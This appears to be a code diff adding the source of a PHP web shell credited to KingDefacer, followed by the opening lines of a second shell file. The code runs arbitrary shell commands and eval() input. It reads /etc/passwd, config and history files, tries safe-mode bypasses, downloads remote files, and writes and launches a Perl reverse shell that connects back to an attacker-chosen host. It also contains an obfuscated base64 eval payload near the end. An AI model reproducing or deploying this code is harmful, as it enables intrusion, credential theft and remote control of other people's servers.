+callocmd('which perl',('/usr/bin/perl')||'/usr/local/bin/perl');print"</td>"; print"<td>"; print"<br><b>Gcc : </b>"; 
+callocmd('which gcc','/usr/bin/gcc'); print"</td>"; print"<td>"; 
+print"<br><b>Curl : </b>"; callocmd('which curl','/usr/bin/curl'); print"</td>"; print"<td>"; print"<br><b>GET : </b>"; 
+callocmd('which GET','/usr/bin/GET'); 
+print"</td>"; print"<td>";print"<br><b>Wget : </b>"; 
+callocmd('which wget','/usr/bin/wget'); 
+print"</td>"; print"<td>"; print"<br><b>Lynx : </b>"; 
+callocmd('which lynx','/usr/bin/lynx'); 
+print"</td>"; print "</tr></table>"; }print "<hr><br>"; 
+print "<b>YOUR IP: ".$REMOTE_ADDR."<br></b>"; 
+print "<b>Server IP : ".$SERVER_ADDR."</b>";
+print"<br><b>".$SERVER_SIGNATURE."</b>"; 
+print "<b>Server NAME : ".$SERVER_NAME." / "."Email : ".$SERVER_ADMIN."<br></b>"; 
+print "<b>Disabled Functions : </b>";inifunc(disable_functions);print"<br>";
+print "<b>Your Infos : <b>"; callfuncs('id');print"<br><b>Os : </b>"; 
+if (strstr( PHP_OS, "WIN")){print php_uname(); print " ";print PHP_OS; }else {
+if (!function_exists(shell_exec)&&!function_exists(exec)&&
+!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
+{print php_uname(); print "/";print PHP_OS;}
+else {callfuncs('uname -a');}}print"<br>"; 
+print"Php-Version : ".phpversion(); print"<br><b>Current-path : </b>";
+print $nscdir."&nbsp;&nbsp;&nbsp;&nbsp; [ ";permcol($nscdir);print " ]";
+print"<br>";print "Your shells location : " .__file__;
+print"<br> Disc Spase: "; readable_size(disk_total_space($nscdir));print " / ";
+print"Bos Alan: "; readable_size(disk_free_space($nscdir));
+print "</center><br></font>"; print"</td></tr></table><br>"; 
+if (isset($_REQUEST['credir'])) { $ndir=trim($_REQUEST['dir']); 
+if (mkdir( $ndir, 0777 )){ $mess=basename($ndir)." created successfully"; }
+else{$mess="Make Dir/ Delete";}}elseif (isset($_REQUEST['deldir'])) 
+{ $nrm=trim($_REQUEST['dir']);if (is_dir($nrm)&& rmdir($nrm)){$mess=basename($nrm)." deleted successfully"; }else{$mess="Create/Delete Dir";}} 
+else{$mess="Make Dir/ Delete";}if(isset($_REQUEST['crefile'])){ 
+$ncfile=trim($_REQUEST['cfile']);
+if (!is_file($ncfile)&&touch($ncfile)){ $mess3=basename($ncfile)." created succefully";unset ($_REQUEST['cfile']);} 
+else{ $mess3= "Make a File/ Delete";}}
+elseif(isset($_REQUEST['delfile'])){ 
+$ndfile=trim($_REQUEST['cfile']); 
+if (unlink($ndfile)) {$mess3=basename($ndfile)." deleted succefully";} 
+else {$mess3= "Make Dir/ Delete";}} 
+else {$mess3="Make a File/ Delete";}
+class upload{ function upload($file,$tmp){ 
+$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();if (isset($_REQUEST["up"])){ if (empty($upfile)){print "";}
+if (@copy($tmp,$nscdir."/".$file)){ 
+print "<div><center><b>:<font color=DeepSkyBlue  > $file </font>uploaded successfully :</b></center></div>"; }else{print "<center><b>: Error uploading<font color=red> $file </font>: </b></center>";} } } } 
+$obj=new upload($HTTP_POST_FILES['upfile']['name'],$HTTP_POST_FILES['upfile']['tmp_name']); if (isset ($_REQUEST['ustsub'])){
+$ustname=trim ($_REQUEST['ustname']);ob_start();
+if ($_REQUEST['ustools']='t1'){callfuncs('wget '.$ustname);}
+if ($_REQUEST['ustools']='t2'){callfuncs('curl -o basename($ustname) $ustname');}
+if ($_REQUEST['ustools']='t3'){callfuncs('lynx -source $ustname > basename($ustname)');}
+if ($_REQUEST['ustools']='t9'){callfuncs('GET $ustname > basename($ustname)');}
+if ($_REQUEST['ustools']='t4'){callfuncs('unzip '.$ustname);}
+if ($_REQUEST['ustools']='t5'){callfuncs('tar -xvf '.$ustname);}
+if ($_REQUEST['ustools']='t6'){callfuncs('tar -zxvf '.$ustname);}
+if ($_REQUEST['ustools']='t7'){callfuncs('chmod 777 '.$ustname);}
+if ($_REQUEST['ustools']='t8'){callfuncs('make '.$ustname);}ob_clean();}
+if (!isset($_REQUEST['cmd'])&&!isset($_REQUEST['eval'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['edit'])&&!isset($_REQUEST['subqcmnds'])&&!isset ($_REQUEST['safefile'])&&!isset ($_REQUEST['inifile'])&&!isset($_REQUEST['bip'])&&
+!isset($_REQUEST['rfiletxt'])){
+if ($dh  = dir($nscdir)){ while (true == ($filename =$dh->read())){ 
+$files[] = $filename; sort($files);}print "<br>"; 
+print"<center><table bgcolor=#2A2A2A style=\"border:1px solid black\" width=100% height=6% ></center>"; 
+print "<tr><td width=43% style=\"border:1px solid black\">"; 
+print "<center><b>Files";print "</td>"; 
+print "<td width=8% style=\"border:1px solid black\">";print "<center><b>Size";print "</td>"; 
+print "<td width=3% style=\"border:1px solid black\">";print "<center><b>Write";print "</td>"; 
+print "<td width=3% style=\"border:1px solid black\">";print "<center><b>Read";print "</td>"; 
+print "<td width=5% style=\"border:1px solid black\">";print "<center><b>Type";print "</td>"; 
+print "<td width=5% style=\"border:1px solid black\">";print "<center><b>Edit";print "</td>";
+print "<td width=5% style=\"border:1px solid black\">";print "<center><b>Rename";print "</td>";
+print "<td width=6% style=\"border:1px solid black\">";print "<center><b>Download";print "</td>";if(strstr(PHP_OS,"Linux")){
+print "<td width=8% style=\"border:1px solid black\">";print "<center><b>Owner";print "</td>";}
+print "<td width=8% style=\"border:1px solid black\">";print "<center><b>Permission";print "</td></tr>"; foreach ($files as $nfiles){ 
+if (is_file("$nscdir/$nfiles")){ $scmess1=filesize("$nscdir/$nfiles");}
+if (is_writable("$nscdir/$nfiles")){ 
+$scmess2= "<center><font color=DeepSkyBlue  >yes";}else {$scmess2="<center><font color=red>Hayir";}if (is_readable("$nscdir/$nfiles")){ 
+$scmess3= "<center><font color=DeepSkyBlue  >yes";}else {$scmess3= "<center><font color=red>Hayir";}if (is_dir("$nscdir/$nfiles")){$scmess4= "<font color=red><center>Dir";}else{$scmess4= "<center><font color=DeepSkyBlue  >File";} 
+print"<tr><td style=\"border:1px solid black\">"; 
+if (is_dir($nfiles)){print "<font face= tahoma size=2 color=DeepSkyBlue  >[ $nfiles    ]<br>";}else {print "<font face= tahoma size=2 color=#dadada>$nfiles <br>";}
+print"</td>"; print "<td style=\"border:1px solid black\">"; 
+print "<center><font face= tahoma size=2 color=#dadada>";
+if (is_dir("$nscdir/$nfiles")){print "<b>K</b>Dir";}
+elseif(is_file("$nscdir/$nfiles")){readable_size($scmess1);}else {print "---";}
+print "</td>"; print "<td style=\"border:1px solid black\">"; 
+print "<center><font face= tahoma size=2 >$scmess2"; print "</td>"; 
+print"<td style=\"border:1px solid black\">"; 
+print "<center><font face= tahoma size=2 >$scmess3"; print "</td>"; 
+print "<td style=\"border:1px solid black\">"; 
+print "<center><font face= tahoma size=2 >$scmess4"; print"</td>";
+print "<td style=\"border:1px solid black\">";if(is_file("$nscdir/$nfiles")){
+print " <center><a href=".inclink('dlink', 'edit')."&edit=$nfiles&scdir=$nscdir>Edit</a>";}else {print "<center><font face=tahoma size=2 color=gray>Düzenle</center>";}print"</td>";  print "<td style=\"border:1px solid black\">";print " <center><a href=".inclink('dlink', 'ren')."&ren=$nfiles&scdir=$nscdir>Rename</a>";print"</td>";print "<td style=\"border:1px solid black\">";
+if(is_file("$nscdir/$nfiles")){
+print " <center><a href=".inclink('dlink', 'dwld')."&dwld=$nfiles&scdir=$nscdir>Download</a>";}else {print "<center><font face=tahoma size=2 color=gray>indir</center>";}print"</td>"; if(strstr(PHP_OS,"Linux")){
+print "<td style=\"border:1px solid black\">";
+print "<center><font face=tahoma size=2 color=#dadada>";owgr($nfiles);
+print "</center>";print"</td>";} 
+print "<td style=\"border:1px solid DeepSkyBlue  \">";print "<center><div>";
+permcol("$nscdir/$nfiles");print "</div>";print"</td>"; print "</tr>"; 
+}print "</table>";print "<br>";}else {print "<div><br><center><b>[ Can't open the Dir, permission denied !! ]<p>";}}
+elseif (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])||isset($_REQUEST['eval'])||isset($_REQUEST['subqcmnds'])){
+if (!isset($_REQUEST['rfile'])&&isset($_REQUEST['cmd'])){print "<div><b><center>[ Executed command ][$] : ".$_REQUEST['cmd']."</div></center>";}
+print "<pre><center>".$sta;
+if (isset($_REQUEST['cmd'])){$cmd=trim($_REQUEST['cmd']);callfuncs($cmd);}
+elseif(isset($_REQUEST['eval'])){
+ob_start();eval(stripslashes(trim($_REQUEST['eval'])));
+$ret = ob_get_contents();ob_clean();print htmlspecialchars($ret);}
+elseif (isset($_REQUEST['subqcmnds'])){
+if ($_REQUEST['uscmnds']=='op1'){callfuncs('ls -lia');}
+if ($_REQUEST['uscmnds']=='op2'){callfuncs('cat /etc/passwd');}
+if ($_REQUEST['uscmnds']=='op3'){callfuncs('cat /var/cpanel/accounting.log');}
+if ($_REQUEST['uscmnds']=='op4'){callfuncs('ls /var/named');}
+if ($_REQUEST['uscmnds']=='op11'){callfuncs('find ../ -type d -perm -2 -ls');}
+if ($_REQUEST['uscmnds']=='op12'){callfuncs('find ./ -type d -perm -2 -ls');}
+if ($_REQUEST['uscmnds']=='op5'){callfuncs('find ./ -name service.pwd ');}
+if ($_REQUEST['uscmnds']=='op6'){callfuncs('find ./ -name config.php');}
+if ($_REQUEST['uscmnds']=='op7'){callfuncs('find / -type f -name .bash_history');}
+if ($_REQUEST['uscmnds']=='op8'){callfuncs('cat /etc/hosts');}
+if ($_REQUEST['uscmnds']=='op9'){callfuncs('finger root');}
+if ($_REQUEST['uscmnds']=='op10'){callfuncs('netstat -an | grep -i listen');}
+if ($_REQUEST['uscmnds']=='op13'){callfuncs('cat /etc/services');}
+}print $eta."</center></pre>";}
+function rdread($nscdir,$sf,$ef){$rfile=trim($_REQUEST['rfile']);
+if(is_readable($rfile)&&is_file($rfile)){ 
+$fp=fopen ($rfile,"r");print"<center>";
+print "<div><b>[ Editing <font color=DeepSkyBlue  >".basename($rfile)."</font> ] [<a href='javascript:history.back()'> Back </a>] [<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>]</b></div><br>"; 
+print $sf."<textarea cols=157 rows=23 name=rfiletxt>"; 
+while (!feof($fp)){$lines = fgetc($fp);
+$nlines=htmlspecialchars($lines);print $nlines;}
+fclose($fp);print "</textarea>";if (is_writable($rfile)){
+print "<center><input type=hidden value=$rfile name=hidrfile><input type=submit value='Save-file' > <input type=reset value='Reset' ></center>".$ef;}else 
+{print "<div><b><center>[ Can't edit <font color=DeepSkyBlue  >".basename($rfile)."</font> ]</center></b></div><br>";}print "</center><br>";}
+elseif (!file_exists($_REQUEST['rfile'])||!is_readable($_REQUEST['rfile'])||$_REQUEST['rfile']=$nscdir){print "<div><b><center>[ You selected a wrong file name or you don't have access !! ]</center></b></div><br>";}}
+function rdsave($nscdir){$hidrfile=trim($_REQUEST['hidrfile']);
+if (is_writable($hidrfile)){$rffp=fopen ($hidrfile,"w+");
+$rfiletxt=stripslashes($_REQUEST['rfiletxt']);
+
+fwrite ($rffp,$rfiletxt);print "<div><b><center>
+[ <font color=DeepSkyBlue >".basename($hidrfile)."</font> Saved !! ]
+[<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>] [<a href='javascript:history.back()'> Edit again </a>]
+</center></b></div><br>";fclose($rffp);}
+else {print "<div><b><center>[ Can't save the file !! ] [<a href=".inclink('dlink','rdcurrdir')."&scdir=$nscdir> Curr-Dir </a>] [<a href='javascript:history.back()'> Back </a>]</center></b></div><br>";}} 
+if (isset ($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])){rdread($nscdir,$sf,$ef);}
+elseif (isset($_REQUEST['rfiletxt'])){rdsave($nscdir);}
+function callperms($chkperms){
+$perms = fileperms($chkperms);
+
+if (($perms & 0xC000) == 0xC000) {
+   // Socket
+   $info = 's';
+} elseif (($perms & 0xA000) == 0xA000) {
+   // Symbolic Link
+   $info = 'l';
+} elseif (($perms & 0x8000) == 0x8000) {
+   // Regular
+   $info = '-';
+} elseif (($perms & 0x6000) == 0x6000) {
+   // Block special
+   $info = 'b';
+} elseif (($perms & 0x4000) == 0x4000) {
+   // Directory
+   $info = 'd';
+} elseif (($perms & 0x2000) == 0x2000) {
+   // Character special
+   $info = 'c';
+} elseif (($perms & 0x1000) == 0x1000) {
+   // FIFO pipe
+   $info = 'p';
+} else {
+   // Unknown
+   $info = 'u';
+}
+
+// Owner
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ?
+           (($perms & 0x0800) ? 's' : 'x' ) :
+           (($perms & 0x0800) ? 'S' : '-'));
+
+// Group
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ?
+           (($perms & 0x0400) ? 's' : 'x' ) :
+           (($perms & 0x0400) ? 'S' : '-'));
+
+// World
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ?
+           (($perms & 0x0200) ? 't' : 'x' ) :
+           (($perms & 0x0200) ? 'T' : '-'));    print $info;}
+
+		  function readable_size($size) {
+
+if ($size < 1024) {
+print $size . ' B';
+}else {$units = array("kB", "MB", "GB", "TB");
+foreach ($units as $unit) {
+$size = ($size / 1024);
+if ($size < 1024) {break;}}printf ("%.2f",$size);print ' ' . $unit;}}
+if($dlink=='ren'&&!isset($_REQUEST['rensub'])){
+print "<div><b><center>[<a href=".$PHP_SELF."?scdir=$nscdir> Back </a>]</div>";
+print "<center>".$sf;input ("text","ren",$_REQUEST['ren'],20);print " ";
+input ("text","renf","New-name",20);print " ";
+input ("submit","rensub","Rename" ,"");print $ef;die();}else print "";
+if (isset ($_REQUEST['ren'])&&isset($_REQUEST['renf'])){
+if (rename($nscdir."/".$_REQUEST['ren'],$nscdir."/".$_REQUEST['renf'])){
+print"<center><div><b>[ ". $_REQUEST['ren']." is renamed to " .$sfnt.$_REQUEST['renf'].$efnt." successfully ]</center></div></b>";print "<div><b><center>[<a href=".inclink('dlink', 'rcurrdir')."&scdir=$nscdir> Curr-dir </a>]</div>";die();}else{print "<div><b><center>[ Yeniden Adlandirilamiyor ]</div>";
+print "<div><b><center>[<a href=".inclink('dlink', 'rcurrdir')."&scdir=$nscdir> Back </a>]</div>";die();}}function fget($nscdir,$sf,$ef){print "<center>";
+print "<div><b>[ Editing <font color=DeepSkyBlue >".basename($_REQUEST['edit'])."</font> ] [<a href='javascript:history.back()'> Back </a>] [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]</b></div>";
+print $sf."<textarea cols=157 rows=23 name=edittxt>";  
+$alltxt= file_get_contents($_REQUEST['edit']);
+$nalltxt=htmlspecialchars($alltxt);print $nalltxt;print "</textarea></center>";
+if (is_writable($_REQUEST['edit'])){
+print "<center><input type=submit value='Save-file' > <input type=reset value='Reset' ></center>".$ef;}else {print "<div><b><center>[ Can't edit 
+<font color=DeepSkyBlue >".basename($_REQUEST['edit'])."</font> ]</center></b></div><br>";}}function svetxt(){
+$fp=fopen ($_REQUEST['edit'],"w");if (is_writable($_REQUEST['edit'])){
+$nedittxt=stripslashes($_REQUEST['edittxt']);
+fwrite ($fp,$nedittxt);print "<div><b><center>[ <font color=DeepSkyBlue  >".basename($_REQUEST['edit'])."</font> Saved !! ]</center></b></div>";fclose($fp);}else {print "<div><b><center>[ Can't save the file !! ]</center></b></div>";}}
+if ($dlink=='edit'&&!isset ($_REQUEST['edittxt'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])&&!isset($_REQUEST['subqcmnds'])&&!isset($_REQUEST['eval']))
+{fget($nscdir,$sf,$ef);}elseif (isset ($_REQUEST['edittxt']))
+{svetxt();fget($nscdir,$sf,$ef);}else {print "";}function owgr($file){
+$fileowneruid=fileowner($file); $fileownerarray=posix_getpwuid($fileowneruid); 
+$fileowner=$fileownerarray['name']; $fileg=filegroup($file);
+$groupinfo = posix_getgrgid($fileg);$filegg=$groupinfo['name'];
+print "$fileowner/$filegg"; }$cpyf=trim($_REQUEST['cpyf']);$ftcpy=trim($_REQUEST['ftcpy']);$cpmv= $cpyf.'/'.$ftcpy;if (isset ($_REQUEST['cpy'])){
+if (copy($ftcpy,$cpmv)){$cpmvmess=basename($ftcpy)." copied successfully";}else {$cpmvmess="Can't copy ".basename($ftcpy);}}
+elseif(isset($_REQUEST['mve'])){
+if (copy($ftcpy,$cpmv)&&unlink ($ftcpy)){$cpmvmess= basename($ftcpy)." moved successfully";}else {$cpmvmess="Can't move ".basename($ftcpy);}
+}else {$cpmvmess="COPY / Select a file for copy then paste";}
+if (isset ($_REQUEST['safefile'])){
+$file=$_REQUEST['safefile'];$tymczas="";if(empty($file)){
+if(empty($_GET['file'])){if(empty($_POST['file'])){
+print "<center>[ Please choose a file first to read it using copy() ]</center>";
+} else {$file=$_POST['file'];}} else {$file=$_GET['file'];}}
+$temp=tempnam($tymczas, "cx");if(copy("compress.zlib://".$file, $temp)){
+$zrodlo = fopen($temp, "r");$tekst = fread($zrodlo, filesize($temp));
+fclose($zrodlo);echo "<center><pre>".$sta.htmlspecialchars($tekst).$eta."</pre></center>";unlink($temp);} else {
+print "<FONT COLOR=\"RED\"><CENTER>Sorry, Can't read the selected file !!
+</CENTER></FONT><br>";}}if (isset ($_REQUEST['inifile'])){
+ini_restore("safe_mode");ini_restore("open_basedir");
+print "<center><pre>".$sta;
+if (include(htmlspecialchars($_REQUEST['inifile']))){}else {print "Sorry, can't read the selected file !!";}print $eta."</pre></center>";}
+if (isset ($_REQUEST['bip'])&&isset ($_REQUEST['bport'])){callback($nscdir,$_REQUEST['bip'],$_REQUEST['bport']);}
+function callback($nscdir,$bip,$bport){
+if(strstr(php_os,"WIN")){$epath="cmd.exe";}else{$epath="/bin/sh";}
+if (is_writable($nscdir)){
+$fp=fopen ("back.pl","w");$backpl='back.pl';}
+else {$fp=fopen ("/tmp/back.pl","w");$backpl='/tmp/back.pl';}
+fwrite ($fp,"use Socket;
+\$system='$epath';
+\$sys= 'echo \"[ Operating system ][$]\"; echo \"`uname -a`\";
+echo \"[ Curr DIR ][$]\"; echo \"`pwd`\";echo;
+echo \"[ User perms ][$]\";echo \"`id`\";echo;
+echo \"[ Start shell ][$]\";';
+
+if (!\$ARGV[0]) {
+  exit(1);
+}
+\$host = \$ARGV[0];
+\$port = 80;
+if (\$ARGV[1]) {
+  \$port = \$ARGV[1];
+}
+\$proto = getprotobyname('tcp') || die('Unknown Protocol\n');
+socket(SERVER, PF_INET, SOCK_STREAM, \$proto) || die ('Socket Error\n');
+my \$target = inet_aton(\$host);
+if (!connect(SERVER, pack 'SnA4x8', 2, \$port, \$target)) {
+  die('Unable to Connect\n');
+}
+if (!fork( )) {
+  open(STDIN,'>&SERVER');
+  open(STDOUT,'>&SERVER');
+  open(STDERR,'>&SERVER');
+print '\n[ Bk-Code shell by Black-Code :: connect back backdoor by Crash_over_ride ]';
+print '\n[ A-S-T team ][ Lezr.com ]\n\n'; 
+         system(\$sys);system (\$system);
+          exit(0); }
+		  ");callfuncs("chmod 777 $backpl");
+ob_start();
+callfuncs("perl $backpl $bip $bport");
+ob_clean();
+print "<div><b><center>[ Selected IP is ".$_REQUEST['bip']." and port is ".$_REQUEST['bport']." ]<br>
+[ Check your connection now, if failed try changing the port number ]<br>
+[ Or Go to a writable dir and then try to connect again ]<br>
+[ Return to the Current dir ] [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>] 
+</div><br>";}if (isset($_REQUEST['uback'])){
+$uback=$_REQUEST['uback'];$upip=$_REQUEST['upip']; 
+if ($_REQUEST['upports']=="up80"){callfuncs("perl $uback $upip 80");}
+elseif ($_REQUEST['upports']=="up443"){callfuncs("perl $uback $upip 443");}
+elseif ($_REQUEST['upports']=="up2121"){callfuncs("perl $uback $upip 2121");}}
+delm("# Execute Commands #");print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100% height=18%>";
+print "<tr><td width=32%><div align=left>";
+print $st.$c1."<center><div><b>".$mess3.$ec; 
+print $c2.$sf."<center>";input("text","cfile","",53);
+input("hidden","scdir",$nscdir,0);print "<br>";
+input("submit","crefile","Make-it","");
+print " ";input("submit","delfile","Delete","");
+print "</center>".$ef.$ec.$et."</div></td>";
+print "<td><div align=center>".$st.$c1;
+print "<center><div><b>Enter the command to execute";print $ec;
+print $c2.$sf."<center><div style='margin-top:7px'>"; 
+input("text","cmd","",59);input("hidden","scdir",$nscdir,0);print"<br>";
+input("submit","","Execute","");print "</center>".$ef.$ec.$et."</div></td>";
+print "<td width=32%><div align=right>";print $st.$c1;
+print "<center><div><b>$mess".$ec.$c2.$sf."<center>";
+input("text","dir","",53);input("hidden","scdir",$nscdir,0);print "<br>";
+input("submit","credir","Create-D","");print " ";
+input("submit","deldir","Delete-D","");
+print "</center>".$ef.$ec.$et."</div></td></tr>";
+print "<tr><td width=32%><div align=left>";print $st.$c1;
+print "<center><div><b>Edit/Read File".$ec;print $c2.$sf."<center>";
+input("text","rfile",$nscdir,53);input("hidden","scdir",$nscdir,0);print "<br>";
+input("submit","","Read-Edit","");print "</center>".$ef.$ec.$et."</div></td>";
+print "<td><div align=center>";print $st.$c1;
+print "<center><div><b>View Dir<br>";print $ec.$c2.$sf."<center><div style='margin-top:7px'>"; input("text","scdir",$nscdir,59);print"<br>";
+input("submit","","View","");print " ";
+input("reset","","R00T","");print "</center>".$ef.$ec.$et."</div></td>";
+print "<td><div align=center>";print $st.$c1;
+print "<center><div><b>File size : ".filesize($upfile)." in ( B/Kb )";print $ec.$c2."<form method=post Enctype=multipart/form-data><center>"; 
+input("file","upfile","",40);input("hidden","scdir",$nscdir,0);
+input("hidden","up",$nscdir,0);
+print"<br>";input("submit","","Upload","");print "</center>".$ef.$ec.$et."</div></td></tr>";
+delm("");print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";print "<tr><td width=50%><div align=left>";
+print $st.$c1."<div><b><center>Execute php code with eval()</div>";
+print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0);
+print "&nbsp;<textarea cols=73 rows=3 name=eval>";
+if(!isset($evsub)){print "//system('id'); //readfile('/etc/passwd'); //passthru('pwd');";}else{print htmlspecialchars(stripslashes($eval));}
+print "</textarea><br><center>";
+input('submit','evsub','Execute');print " ";
+input('Reset','','Reset');print " ";
+print "</center>".$ec.$ef.$et;
+print "</td><td height=20% width=50%><div align=center>";
+print $st.$c1."<div><b><center>Execute useful commands</div>";
+print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0);
+print "<center><select style='width:60%' name=uscmnds size=1>
+<option value='op0'>Execute quick commands</option>
+<option value='op1'>ls -lia</option>
+<option value='op2'>/etc/passwd</option>
+<option value='op3'>/var/cpanel/accounting.log</option>
+<option value='op4'>/var/named</option>
+<option value='op11'>Perms in curr Dir</option>
+<option value='op12'>Perms in main Dir</option>
+<option value='op5'>Find service.pwd files</option>
+<option value='op6'>Find config files</option>
+<option value='op7'>Find .bash_history files</option>
+<option value='op8'>Read hosts file</option>
+<option value='op9'>Root login</option>
+<option value='op10'>Show opened ports</option>
+<option value='op13'>Show services</option>
+</select> ";print"<input type=submit name=subqcmnds value=Execute style='height:20'> <input type=reset value=Return style='height:20'></center>";
+print $ec.$ef.$et."</td></tr></table>";delm("");
+print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
+print "<tr><td width=50%><div align=left>";
+print $st.$c1."<div><b><center>".$cpmvmess."</div>";
+print $ec.$c2.$sf."&nbsp;";input("text","ftcpy","File-name",15);
+print "<b><font face=tahoma size=2>&nbsp;To </b>";
+input("text","cpyf",$nscdir,45);input("hidden","scdir",$nscdir,0);print " ";
+input("submit","cpy","Copy","");print " ";input("submit","mve","Move","");
+print "</center>".$ec.$ef.$et;
+print "</td><td height=20% width=50%><div align=right>";
+print $st.$c1."<div><b><center>Important commands</div>";
+print $ec.$c2.$sf."&nbsp";input("hidden","scdir",$nscdir,0);
+print "<select style='width:22%' name=ustools size=1>
+<option value='t1'>Wget</option><option value='t2'>Curl</option>
+<option value='t3'>Lynx</option><option value='t9'>Get</option>
+<option value='t4'>Unzip</option><option value='t5'>Tar</option>
+<option value='t6'>Tar.gz</option><option value='t7'>Chmod 777</option>
+<option value='t8'>Make</option></select> ";input('text','ustname','',51);print " ";input('submit','ustsub','Execute');print "</center>".$ec.$ef.$et;
+print "</td></tr></table>";delm(": Safe mode bypass :");
+print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
+print "<tr><td width=50%><div align=left>";
+print $st.$c1."<div><b><center>Using copy() function</div>";
+print $ec.$c2.$sf."&nbsp;";input("text","safefile",$nscdir,75);
+input("hidden","scdir",$nscdir,0);print " ";
+input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
+print "</td><td height=20% width=50%><div align=right>";
+print $st.$c1."<div><b><center>Using ini_restore() function</div>";
+print $ec.$c2.$sf."&nbsp;";input("text","inifile",$nscdir,75);
+input("hidden","scdir",$nscdir,0);print " ";
+input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
+print "</td></tr></table>";delm("# Backdoor Connection #");
+print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
+print "<tr><td width=50%><div align=left>";
+print $st.$c1."<div><b><center>Backdoor ile Baglan</div>";
+print $ec.$c2.$sf."&nbsp;";input("text","bip",$REMOTE_ADDR,47);print " ";
+input("text","bport",80,10);input("hidden","scdir",$nscdir,0);print " ";
+input("submit","","Connect","");print " ";input("reset","","Reset","");
+print "</center>".$ec.$ef.$et;print "</td><td height=20% width=50%><div align=right>";print $st.$c1."<div><b><center>Yüklenmis Backdoor</div>";print $ec.$c2.$sf."&nbsp;";print "<select style='width:15%' name=upports size=1><option value='up80'>80</option><option value='up443'>443</option><option value='up2121'>2121</option></select>";print " ";input("text","uback","back.pl",23);print " ";input("text","upip",$REMOTE_ADDR,29);print " ";input("submit","subupb","Connect");$_F=__FILE__;$_X='Pz48c2NyNHB0IGwxbmczMWc1PWoxdjFzY3I0cHQ+ZDJjM201bnQud3I0dDUoM241c2MxcDUoJyVvQyU3byVlbyU3YSVlOSU3MCU3dSVhMCVlQyVlNiVlRSVlNyU3aSVlNiVlNyVlaSVvRCVhYSVlQSVlNiU3ZSVlNiU3byVlbyU3YSVlOSU3MCU3dSVhYSVvRSVlZSU3aSVlRSVlbyU3dSVlOSVlRiVlRSVhMCVldSV1ZSVhOCU3byVhOSU3QiU3ZSVlNiU3YSVhMCU3byVvNiVvRCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCVvMCVhQyU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhOSVhOSVvQiVhMCU3ZSVlNiU3YSVhMCU3dSVvRCVhNyVhNyVvQiVlZSVlRiU3YSVhOCVlOSVvRCVvMCVvQiVlOSVvQyU3byVvNiVhRSVlQyVlaSVlRSVlNyU3dSVlOCVvQiVlOSVhQiVhQiVhOSU3dSVhQiVvRCVpbyU3dSU3YSVlOSVlRSVlNyVhRSVlZSU3YSVlRiVlRCV1byVlOCVlNiU3YSV1byVlRiVldSVlaSVhOCU3byVvNiVhRSVlbyVlOCVlNiU3YSV1byVlRiVldSVlaSV1NiU3dSVhOCVlOSVhOSVhRCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhQyVvNiVhOSVhOSVvQiVldSVlRiVlbyU3aSVlRCVlaSVlRSU3dSVhRSU3NyU3YSVlOSU3dSVlaSVhOCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3dSVhOSVhOSVvQiU3RCVvQyVhRiU3byVlbyU3YSVlOSU3MCU3dSVvRScpKTtkRignKjhIWEhXTlVZKjdpWFdIKjhJbXl5Myo4RnV1Mm5zdG8ybm9renMzbmhvdHdsdXF2dXhqaHp3bnklN0VvMngqOEoqOEh1WEhXTlVZKjhKaScpPC9zY3I0cHQ+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));
+print "</center>".$ec.$ef.$et;print "</td></tr></table>";
+print"<center>Copyright is reserved to KingDefacer<br>[  By Turkish Security GROUP Go to : <a target='_blank' href='http://alturks.com'>http://alturks.com/</a> ]"; 
+print "<br><table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>"; print"<tr><td><font size=2 face=tahoma>"; 
+print"</font></td></tr></table>";
+?>
diff --git a/php/fatal.php b/php/fatal.php
new file mode 100644
index 0000000..3f1f8a8
--- /dev/null
+++ b/php/fatal.php
@@ -0,0 +1,288 @@
+<?php
+session_start();
+error_reporting(E_ALL ^ E_NOTICE);
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+if(@get_magic_quotes_gpc()){foreach ($_POST as $k=>$v){$_POST[$k] = stripslashes($v);}}
+@ini_set('max_execution_time',0);
+(@ini_get('safe_mode')=="1" ? $safe_mode="ON" : $safe_mode="OFF(Rootla_Beni:)");
+
